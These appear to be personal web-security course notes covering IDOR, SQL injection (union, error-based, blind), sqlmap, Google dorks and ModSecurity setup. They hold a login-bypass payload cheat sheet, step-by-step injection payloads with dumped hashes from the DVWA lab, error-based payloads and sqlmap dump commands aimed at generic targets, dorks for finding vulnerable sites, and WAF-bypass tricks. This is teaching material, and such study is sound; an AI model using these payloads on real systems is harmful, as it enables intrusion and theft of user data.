	There are 4 types of authentication
		1. Basic Authentication
		2. Integrated Authentication
		3. Digest Authentication
		4. Form Based Authentication

Logic Gates
===========
AND Gate --> If any of the value is false, then the ans will be flase

	0 and 0 = 0
	0 and 1 = 0
	1 and 0 = 0
	1 and 1 = 1

OR --> If any of the value is true, then the answer will be true

	0 or 0 = 0
	0 or 1 = 1
	1 or 0 = 1
	1 or 1 = 1

1 ---> True ---> Administrator

' ---> Single inverted Comma ---> Use to break the SQL query

1'or'1'='1
select '1'or'1'='1'

Username --> 1'or'1'='1 always true
Password --> 1'or'1'='1 always true
		Administrator Login
		x'or'x'='x ---> true

Cupons| Promo Code ---> 1'or'1'='1


Cheat sheet
===========
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055


LVS setup
=========
Lucideus Vulnerable Simulator
=============================

DVWA --> Damm Vulnerable Web Application
----------------------------------------
	Open Source

LVS_1.zip
1. Copy the zip file
2. Paste it in C:xampphtdocs
3. Extract the zip file
				LVS_1
4. Start the xampp server
		Apache
		MySQL
5. Start the browser
		127.0.0.1/lvs_1
6. Click on the link --> lvs111

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 10
==========
Insecure Direct Object References
---------------------------------
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

www.bank.com/aofn/akjf.php?id=12 ---> Account1
www.bank.com/aofn/akjf.php?id=11 ---> Account2
www.bank.com/aofn/akjf.php?id=10 ---> Account3
	if I will change the id value to another ID value, and can have the access of another account, it is considered to be Insecure Direct Object References

http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
				User ID	= 1
				Username = Admin
				Password= password

If I change the value of .php?Id=1 to .php?Id=2, then I can have the access of another account whose ID is 2

Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
Oyorooms.com/afogn/adifn.php?ID=admin.php

id = 1 ---> 1 represents a token containing a value of --> Username, password and other information.

Get Parameter
-------------
php?Id=1 -->
Something = something

Sensitive Data Exposure
=======================
	Personal Data
	Credential Data
	Banking Data
	Economical Data
	Financial Data

1. When data is transmitted in the url, that is your crendentials are transmitted via GET Parameter.
	username=user&password=pass&sumbit=submit
2. When data is stored in plain text form rather then hashed or encrypted form.
3. When data is stored in the text file rather then to be stored in the databsae.

	 Id 	Interest 	Gender 	Username 	Password
	 -----------------------------------------------
	1 	    Badminton 	Female 	admin 		Pa$$woRd
	2 		Football 	Male 	admin2 		paSSwOrd


Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.

DVWA
====
Damn Vulnerable Web Application
-------------------------------
	It is a web application which is Vulnerable by default. This application is used for testing the skills and to perform web application attacks passed by OWASP.

	Could not connect to the database - please check the config file.
	1. Goto c:xampphtdocsdvwadvwa-1.0.8
	2. Open the config folder
	3. config.inc.php
	4. $_DVWA = array();
		$_DVWA[ 'db_server' ] = 'localhost';
		$_DVWA[ 'db_database' ] = 'dvwa';
		$_DVWA[ 'db_user' ] = 'root';
		$_DVWA[ 'db_password' ] = 'p@ssw0rd';

		change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
							$_DVWA[ 'db_password' ] = '';
		save the file

Username:admin
password:password


SQL Injections
==============
	Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
	SQLi

UNION BASED SQL INJECTION
=========================
	Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.

DEMO
====
DVWA ---> Security:Low
			SQL Injection
Step 1
======
To find 'GET' parameter.
	something=something
		php?id=something
		php?id=cat
		php?id=1
		php?id=query

	Either you click on some link of the web application|site or enter something in the search box.

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 2
======
To generate a SQL error, to break the query.
	1
	1'

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#

	You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

	'select * from table '
	'select * from table' '

Step 3
======
To count the number of columns, in the web application.
	For counting the number of columns, I will use order by

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
		Shows me data
		This query means that I am asking the database to arrange the data according to column number 1

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
		Shows me data
		This query means that I am asking the database to arrange the data according to column number 2

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
		Gives me error
			Unknown column '3' in 'order clause'
		This query means that I am asking the database to arrange the data according to column number 3
		But there is no column number 3 --> so it will generate an error

order by n--+
	n starts from 1 and ends when i receive an error for the value of n
	--+ ---> To comment out
			if there is any data passed down after --+, it will not execute at all.

	There are 2 columns, in the database.

Step 4
======
To merge the data of all the columns, using UNION command.
	union select 1,2,...,n-1--+
	n=3
	union select 1,2--+


http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

		ID: 1' union select 1,2--
		First name: admin
		Surname: admin

		ID: 1' union select 1,2--
		First name: 1
		Surname: 2

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

	database() --> database name
	version()  --> Database Version Number

	ID: 1' union select database(),version()--
	First name: admin
	Surname: admin

	ID: 1' union select database(),version()--
	First name: dvwa
	Surname: 10.1.25-MariaDB

Step 5
======
To call database ki ma --> information_schema, for getting the information about the table names
	Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
		information_schema.tables
					|-> It stores the name of all the table names in the database.

	union select table_name,2 from information_schema.tables--+
					or
	union select 1,table_name from information_schema.tables--+

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Step 6
======
I will again call database ki maa for columns names in the table names as users
	information_schema
	information_schema.columns

	union select 1,column_name from information_schema.columns where table_name="users"--+


ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: admin
Surname: admin

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: user_id

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: first_name

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: last_name

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: user

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: password


	column name --> user_id
					first_name
					Last_name
					user
					password

Step 7
======
To retreive data from the above data.
	DVWA --> Users --> (User_id,first_name,Last_name,user,Password)

	union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+

	1
	admin
	admin
	admin
	5f4dcc3b5aa765d61d8327deb882cf99

	2
	Gordon
	Brown
	gordonb
	e99a18c428cb38d5f260853678922e03 --> abc123

	3
	Hack
	Me
	1337
	8d3533d75ae2c3966d7e0d4fcc69216b --> charley

	4
	Pablo
	Picasso
	pablo
	0d107d09f5bbe40cade3de5c71e9e9b7

	5
	Bob
	Smith
	smithy
	5f4dcc3b5aa765d61d8327deb882cf99

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 11
==========
ERROR BASED SQL INJECTION
==========================
Error based SQL Injection is type of SQL Injection technique to make the error message show Data in just the form of Database Errors instead of SQL Syntax error like in Union Based, for when we have a blind vulnerability that shows error, so we can extract sensitive data from the database directly.

The errors are very useful during the time of development of a web application but they should be disabled on a Live Website, because errors always shows the Internal Sensitive Data of the Database.

Error Based SQL Injection works on the ASP Technology (asp.net , aspx) which is a open source server side web application Developed by Microsoft, using the Microsoft MSSQL Server.


TRUE CONDITION :
---------------

Here 1 is True and 0 is False.

AND GATE REPRESENTATION

A    |    B    |    Resultant |
------------------------------|
0    |    0    |    0         |
0    |    1    |    0         |
1    |    0    |    0         |
1    |    1    |    1         |

Checking the Last True Condition it states :

1 & 1  = 1    ie;   1*1=1  or True*True = True

MAKING THIS TRUE CONDITION FALSE

1 & 0  = 0    ie;   1*0=0  or True*False = False


Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.


DEMONSTRATION
===============

Normally a SQL Syntax can goes like :

?id=10  |  ?id=10 and 1 =1 ;			//TRUE
Which means a Condition is true and it will revert a Genuine Website.

- So, we can change and can create a Error in the SQL Command by :
        ?id=10 and 1=0;					//FALSE
Which will create and revert a Errors of the Database.

CONDITIONS OF ERROR BASED SQLI
===============================
= Only One Query can execute at a Particular time, not like finding out the Table Names etc we do on Union Based.
= It works on the basis of Last In First Out (LIFO).
= Only the Top Table of the Database can be accessed at a single particular time. Same  goes for Columns and then for Rows.

----
First as same as Union Based SQLI, we start finding the number of columns and the Vulnerable column. Suppose the vulnerable column is 10.

After creating a Error, We will start executing the command and extracting the data from the First Table from the Database.

For selecting the Top First Table (Cause we cannot directly go a “n” number column),

=	?id=10 and 1=0 select top 1 table_name from information_schema.tables

This will extract and give the Data of the First Table from the Database Including its name and other entities. If the Data is Juicy then extract it, else we go for the next tables and columns.

----

For deselecting the Top/Current Table and selecting/extracting the next table,

=	?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“Name of the previous tables”)

Here we are selecting the next Top Table excluding the Previous one and then extracting its data through the Database Errors. For eg. if the First Top Table is named as “Images”, the query will be :
?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“images”, "guestbook")

----

After getting through our Juicy Table, we go for the data which are situated in there columns.

=	?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in (“images”)

Here we get the data of the extracted of the Columns which are not of the Table named Images.

DEMO
====

http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+

http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
		we Will Get The Version Printed on The WebPage


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Here is Our Query To Get The  Database.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Now We Have To Get The Tables. As We Want Tables From Primary Database .
		Here Is The Query For Tables From Primary Database.

		Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1 Until You Get Your Desired Table Name .


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Now We Have to Get The Column Names From The Table Name. We Got Table Of Admin. So Lets Get The Columns From Table Admin . Here Is The Query For Getting Column Names From The Table Admin.

		To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
		Here Is that PART in Our Query.

		Table_name=ADMIN
		Here Is The HEX Value of ADMIN=61646d696e
		And Put it With 0x to Build Our Correct Query.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 until we Get The Column Name Like Username and Password.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		After We Get The Column names Like Username And Password. Next Step Is To Extract Data From These Columns.

		WE Put The TABLENAME=Admin
		And
		Column_name_1=username
		Column_name_2=password


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+


STACKED QUERY SQL INJECTION
============================
Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.

This can done by SQL Injection Automated Tools like “SQLMAP” etc.

SQLMAP --> Python based Command Line TOOL for automate sql injection
	http://sqlmap.org/
	Python 2.7 --> https://www.python.org/download/releases/2.7/
HAVIJ --> Illegal tool, GUI based


SQLMAP
======
1.
	sqlmap.py
2. To test if the website id up or not or if it is vulnerable or not
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
3. To get the database ----> --dbs
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs

available databases [2]:
[*] acuart
[*] information_schema

4. To get the tables
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

5. To get the columns
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

6. To dump the data from the columns
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump

Database: acuart
Table: users
[1 entry]
+------------+-------+------+
| name       | uname | pass |
+------------+-------+------+
| John Smith | test  | test |
+------------+-------+------+

HAVIJ
=====
GUI Based tool


Google Dorks
============
Advance Google Searching Techniques
-----------------------------------
Google Hacking Database.

Arijit Singh

When ever we search anything on google, google seach enging shows us the data into 3 different colors.

	Blue --> Headings --> Titles
	Green -> Links and urls
	Black -> Content

	intitle: inception
	inurl: inception
	intext: inception

	title--> movie
	url --> inception
		intitle:movie and inrul:inception

	indexof:/inception

	hacking filetype:pdf

	SQL Injection Vulnerable Web Sites
	----------------------------------
	inurl:php?id=

	inurl:/view/viewer_index.shtml

Session 12
==========
Introduction to Firewall
------------------------
Firewall
--------
	It is an extra security layer, which helps me securing our web application and web site. It acts as the middle layer between the data transmission of user and the server.
	Firewall act as the filter. It filters the unwanted packets and malicious packets. Firewall works on the basis of signature and permutation and combination of queries which are transmitted by the user. Knowledgebase --> It acts just like database for signatures and combinations.

There are two types of firewall:
1. Software Solution Firewall
2. Hardware Solution Firewall

Software Solution Firewall
--------------------------
	These are the softwares which are installed in the server.
	Microsoft windows Firewall

Hardware Solution Firewall
--------------------------
	They are the hardwares, which act as the man in the middle, and filters the packet which are malicious.
	MOD Security

WAF --> Web Application Firewall
--------------------------------
MOD Security
------------

Installation of Mod Security
============================
Installing and configuring ModSecurity

Step 1: open terminal and type
        $ apt-get update
        $ apt-get upgrade
        $ apt-get install apache2

Step 2: $ sudo apt-get install libapache2-modsecurity

Step 3: Now we need to place a modsecurity.conf configuration file into the /etc/modsecurity
        $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
 now open
        $ sudo nano /etc/modsecurity/modsecurity.conf
Find this line:
        SecRuleEngine DetectionOnly

and change it to:

        SecRuleEngine On

Step 4: now check the apache2 log directory:
        $ ls /var/log/apache2

You should see three files: access.log, error.log and other_vhosts_access.log.

Now restart the apache2 service and check this directory again
        $ sudo service apache2 reload
        $ ls /var/log/apache2
A new log called modsec_audit.log was created

Step 5: now check the modsecurity-crs direcotry
        $ ls /usr/share/modsecurity-crs/
 the directories: activated_rules, base_rules, experimental_rules and optional_rules

Step 6: for activate all of the rules in the base_rules and optional_rules directories so execute the following commands in a terminal:
        $ cd /usr/share/modsecurity-crs/base_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done

        $ cd ..
        $ cd optional_rules
        $ cd /usr/share/modsecurity-crs/optional_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done

        $ cd ..
        $ cd experimental_rules
        $ cd /usr/share/modsecurity-crs/experimental_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done


Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
        $ sudo nano /etc/apache2/mods-available/security2.conf

        At the end of the file just before </IfModule> enter the following lines:
        Include "/usr/share/modsecurity-crs/*.conf"
        Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
        save it

Step 8: We must enable the headers module, this allows ModSecurity to control and modify the HTTP headers for both requests and  responses.
        $ sudo a2enmod headers
        Now restart apache:
        $ sudo service apache2 restart


cd /etc/apache2/sites-available
ls ---> 000-default.conf
sudo nano 000-default.conf
edit
	ProxyPass --> Web application IP
	ProxyPassReverse --> Web application IP
save and exit
sudo service apache2 restart

Bypassing MOD_SECURITY
======================

union select 1,2--+
	Block
Mix Cases
	UnIoN SeLeCt 1,2--+
Inline Executable Comments
	/*!UnIoN*/ /*!SeLeCt*/ 1,2--+
	/*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+

BLIND SQL INJECTION
===================
	Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response. This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi. This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
	1. Blind Boolean
	2. Time Based SQL Injection

http://newsletter.com/items.php?id=2
------------------------------------
select title,description from items where id=2
----------------------------------------------

http://newsletter.com/items.php?id=2 and 1=2

select title,description from items where id=2 and 1=2

Demo
====
	1
	1'
	1' and 1=0 # ---> False
	1' and 1=1 # ---> True
	1' and 1=0 order by 1 # --> No Result ---> Generic error
	1' and 1=1 order by 1 # --> Result --> normal result
	1' and 1=0 order by 2 # --> No result
	1' and 1=1 order by 2 # ---> Result
	1' and 1=0 order by 3 # ---> No Result
	1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns

	1' and 1=0 union select 1,2 #
			ID: 1' and 1=0 union select 1,2 #
			First name: 1
			Surname: 2

	1' and 1=1 union select 1,2 #
			ID: 1' and 1=1 union select 1,2 #
			First name: admin
			Surname: admin

			ID: 1' and 1=1 union select 1,2 #
			First name: 1
			Surname: 2

	1' and 1=0 union select NULL,2 # --> nO dATA

	1' and 1=1 union select null,2 #---> 	 Shows Data
			ID: 1' and 1=1 union select null,2 #
			First name: admin
			Surname: admin

			ID: 1' and 1=1 union select null,2 #
			First name:
			Surname: 2

	1' and 1=0 union select null,substr(@@version,1,1)=5 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,1,1)=4 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0